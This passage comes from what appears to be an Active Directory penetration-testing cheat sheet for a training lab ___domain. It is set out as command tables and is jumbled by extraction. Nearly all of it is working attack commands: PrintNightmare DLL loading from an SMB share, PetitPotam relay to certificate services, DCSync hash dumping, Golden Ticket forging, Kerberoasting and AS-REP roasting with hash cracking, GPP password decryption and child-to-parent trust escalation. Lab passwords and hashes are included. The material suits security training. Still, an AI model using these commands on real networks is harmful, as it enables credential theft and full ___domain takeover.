sudo smbserver.py -smb2support CompData Used to create an SMB server and host a
/path/to/backupscript.dll shared folder (CompData) at the specified
___location on the local linux host. This can
be used to host the DLL payload that the
exploit will attempt to download to the
host. Performed from a Linux-based host.

sudo python3 CVE-2021-1675.py Executes the exploit and specifies the


inlanefreight.local/<username>: ___location of the DLL payload. Performed
<password>@172.16.5.5
'\\10.129.202.111\CompData\backupscript.dll' from a Linux-based host.

PetitPotam
Command Description

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY- Impacket tool


EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs -- used to create an
template DomainController
NTLM relay by
specifiying the
web enrollment
URL for the
Certificate
Authority host.
Perfomred from a
Linux-based host.
Command Description

git clone https://github.com/topotam/PetitPotam.git Used to clone the


PetitPotam exploit
using git.
Performed from a
Linux-based host.

python3 PetitPotam.py 172.16.5.225 172.16.5.5 Used to execute


the PetitPotam
exploit by
specifying the IP
address of the
attack host
(172.16.5.255)
and the target
Domain Controller
(172.16.5.5).
Performed from a
Linux-based host.

python3 /opt/PKINITtools/gettgtpkinit.py Uses


INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <base64 gettgtpkinit.py
certificate> = dc01.ccache
to request a TGT
ticket for the
Domain Controller
(dc01.ccache)
from a Linux-
based host.

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no- Impacket tool


pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL used to perform a
DCSync attack
and retrieve one
or all of the NTLM
password hashes
from the target
Windows ___domain.
Performed from a
Linux-based host.

klist krb5-user
command used to
view the contents
of the ccache file.
Performed from a
Linux-based host.
Command Description

python /opt/PKINITtools/getnthash.py -key Used to submit


70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 TGS requests
INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$
using
getnthash.py from
a Linux-based
host.

secretsdump.py -just-dc-user INLANEFREIGHT/administrator Impacket tool


"ACADEMY-EA-DC01$"@172.16.5.5 -hashes used to extract
aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba
hashes from
NTDS.dit using a
DCSync attack
and a captured
hash (-hashes).
Performed from a
Linux-based host.

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /<base64 Uses Rubeus to


certificate>=/ptt request a TGT
and perform a
pass-the-ticket
attack using the
machine account
(/user:ACADEMY-
EA-DC01$) of a
Windows target.
Performed from a
Windows-based
host.

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt Performs a


DCSync attack
using Mimikatz.
Performed from a
Windows-based
host.

Miscellaneous Misconfigurations
Command Description
Command Description

Import-Module .\SecurityAssessment.ps1 Used to import the module Security


Assessment.ps1. Performed from a Windows-
based host.

Get-SpoolStatus -ComputerName ACADEMY- SecurityAssessment.ps1 based tool used to


EA-DC01.INLANEFREIGHT.LOCAL enumerate a Windows target for MS-PRN
Printer bug. Performed from a Windows-
based host.

adidnsdump -u inlanefreight\\forend Used to resolve all records in a DNS zone over


ldap://172.16.5.5 LDAP from a Linux-based host.

adidnsdump -u inlanefreight\\forend Used to resolve unknown records in a DNS


ldap://172.16.5.5 -r zone by performing an A query (-r) from a
Linux-based host.

Get-DomainUser * | Select-Object PowerView tool used to display the description


samaccountname,description field of select objects (Select-Object) on a
target Windows ___domain from a Windows-
based host.

Get-DomainUser -UACFilter PowerView tool used to check for the


PASSWD_NOTREQD | Select-Object PASSWD_NOTREQD setting of select objects
samaccountname,useraccountcontrol
(Select-Object) on a target Windows ___domain
from a Windows-based host.

ls \\academy-ea- Used to list the contents of a share hosted on a


dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts Windows target from the context of a currently
logged on user. Performed from a Windows-
based host.

Group Policy Enumeration & Attacks


Command Description

gpp-decrypt Tool used to decrypt a captured group


VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE policy preference password from a Linux-
based host.
Command Description

crackmapexec smb -L | grep gpp Locates and retrieves a group policy


preference password using CrackMapExec,
the filters the output using grep. Peformed
from a Linux-based host.

crackmapexec smb 172.16.5.5 -u forend -p Locates and retrieves any credentials


Klmcargo2 -M gpp_autologin stored in the SYSVOL share of a Windows
target using CrackMapExec from a Linux-
based host.

Get-DomainGPO | select displayname PowerView tool used to enumerate GPO


names in a target Windows ___domain from a
Windows-based host.

Get-GPO -All | Select DisplayName PowerShell cmd-let used to enumerate


GPO names. Performed from a Windows-
based host.

$sid=Convert-NameToSid "Domain Users" Creates a variable called $sid that is set


equal to the Convert-NameToSid tool and
specifies the group account Domain Users.
Performed from a Windows-based host.

Get-DomainGPO | Get-ObjectAcl | ? PowerView tool that is used to check if the


{$_.SecurityIdentifier -eq $sid Domain Users (eq $sid) group has any
rights over one or more GPOs. Performed
from a Windows-based host.

Get-GPO -Guid 7CA9C789-14CE-46E3-A722- PowerShell cmd-let used to display the


83F4097AF532 name of a GPO given a GUID. Performed
from a Windows-based host.

ASREPRoasting
Command Description
Command Description

Get-DomainUser -PreauthNotRequired | select PowerView based tool used to


samaccountname,userprincipalname,useraccountcontrol search for the DONT_REQ_PREAUTH
| fl
value across in user accounts in a
target Windows ___domain.
Performed from a Windows-
based host.

.\Rubeus.exe asreproast /user:mmorgan /nowrap Uses Rubeus to perform an ASEP


/format:hashcat Roasting attack and formats the
output for Hashcat. Performed
from a Windows-based host.

hashcat -m 18200 ilfreight_asrep Uses Hashcat to attempt to crack


/usr/share/wordlists/rockyou.txt the captured hash using a
wordlist (rockyou.txt). Performed
from a Linux-based host.

kerbrute userenum -d inlanefreight.local --dc Enumerates users in a target


172.16.5.5 /opt/jsmith.txt Windows ___domain and
automatically retrieves the AS for
any users found that don't require
Kerberos pre-authentication.
Performed from a Linux-based
host.

Trust Relationships - Child > Parent Trusts


Command Description

Import-Module activedirectory Used to import the Active


Directory module. Performed
from a Windows-based host.

Get-ADTrust -Filter * PowerShell cmd-let used to


enumerate a target Windows
___domain's trust relationships.
Performed from a Windows-
based host.
Command Description

Get-DomainTrust PowerView tool used to


enumerate a target Windows
___domain's trust relationships.
Performed from a Windows-
based host.

Get-DomainTrustMapping PowerView tool used to perform


a ___domain trust mapping from a
Windows-based host.

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL PowerView tools used to


| select SamAccountName enumerate users in a target
child ___domain from a Windows-
based host.

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt Uses Mimikatz to obtain the


KRBTGT account's NT Hash from a
Windows-based host.

Get-DomainSID PowerView tool used to get the


SID for a target child ___domain
from a Windows-based host.

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL - PowerView tool used to obtain


Identity "Enterprise Admins" | select the Enterprise Admins group's
distinguishedname,objectsid
SID from a Windows-based
host.

ls \\academy-ea-dc01.inlanefreight.local\c$ Used to attempt to list the


contents of the C drive on a
target Domain Controller.
Performed from a Windows-
based host.

mimikatz # kerberos::golden /user:hacker Uses Mimikatz to create a


/___domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21- Golden Ticket from a Windows-
2806153819-209893948-922872689
/krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1- based host .
5-21-3842939050-3880317879-2865463114-519 /ptt

.\Rubeus.exe golden Uses Rubeus to create a Golden


/rc4:9d765b482771505cbe97411065964d5f Ticket from a Windows-based
/___domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-
2806153819-209893948-922872689 /sids:S-1-5-21- host.
3842939050-3880317879-2865463114-519 /user:hacker
/ptt
Command Description

mimikatz # lsadump::dcsync Uses Mimikatz to perform a


/user:INLANEFREIGHT\lab_adm DCSync attack from a
Windows-based host.

secretsdump.py logistics.inlanefreight.local/htb- Impacket tool used to perform a


[email protected] -just-dc-user DCSync attack from a Linux-
LOGISTICS/krbtgt
based host.

lookupsid.py logistics.inlanefreight.local/htb- Impacket tool used to perform a


[email protected] SID Brute forcing attack from a
Linux-based host.

lookupsid.py logistics.inlanefreight.local/htb- Impacket tool used to retrieve


[email protected] | grep "Domain SID" the SID of a target Windows
___domain from a Linux-based
host.

lookupsid.py logistics.inlanefreight.local/htb- Impacket tool used to retrieve


[email protected] | grep -B12 "Enterprise the SID of a target Windows
Admins"
___domain and attach it to the
Enterprise Admin group's RID
from a Linux-based host.

ticketer.py -nthash 9d765b482771505cbe97411065964d5f Impacket tool used to create a


-___domain LOGISTICS.INLANEFREIGHT.LOCAL -___domain-sid S- Golden Ticket from a Linux-
1-5-21-2806153819-209893948-922872689 -extra-sid S-
1-5-21-3842939050-3880317879-2865463114-519 hacker based host.

export KRB5CCNAME=hacker.ccache Used to set the KRB5CCNAME


Environment Variable from a
Linux-based host.

psexec.py Impacket tool used to establish


LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea- a shell session with a target
dc01.inlanefreight.local -k -no-pass -target-ip
172.16.5.5 Domain Controller from a Linux-
based host.

raiseChild.py -target-exec 172.16.5.5 Impacket tool that automatically


LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm performs an attack that
escalates from child to parent
___domain.

Trust Relationships - Cross-Forest


Command Description

Get-DomainUser -SPN -Domain PowerView tool used to enumerate accounts for


FREIGHTLOGISTICS.LOCAL | select associated SPNs from a Windows-based host.
SamAccountName

Get-DomainUser -Domain PowerView tool used to enumerate the mssqlsvc


FREIGHTLOGISTICS.LOCAL -Identity account from a Windows-based host.
mssqlsvc | select
samaccountname,memberof

.\Rubeus.exe kerberoast Uses Rubeus to perform a Kerberoasting Attack


/___domain:FREIGHTLOGISTICS.LOCAL against a target Windows ___domain
/user:mssqlsvc /nowrap
(/___domain:FREIGHTLOGISTICS.local) from a
Windows-based host.

Get-DomainForeignGroupMember -Domain PowerView tool used to enumerate groups with


FREIGHTLOGISTICS.LOCAL users that do not belong to the ___domain from a
Windows-based host.

Enter-PSSession -ComputerName PowerShell cmd-let used to remotely connect to a


ACADEMY-EA- target Windows system from a Windows-based
DC03.FREIGHTLOGISTICS.LOCAL -
Credential host.
INLANEFREIGHT\administrator

GetUserSPNs.py -request -target- Impacket tool used to request (-request) the TGS
___domain FREIGHTLOGISTICS.LOCAL ticket of an account in a target Windows ___domain
INLANEFREIGHT.LOCAL/wley
(-target-___domain) from a Linux-based host.

bloodhound-python -d Runs the Python implementation of BloodHound


INLANEFREIGHT.LOCAL -dc ACADEMY-EA- against a target Windows ___domain from a Linux-
DC01 -c All -u forend -p Klmcargo2
based host.

zip -r ilfreight_bh.zip *.json Used to compress multiple files into 1 single .zip
file to be uploaded into the BloodHound GUI.

You might also like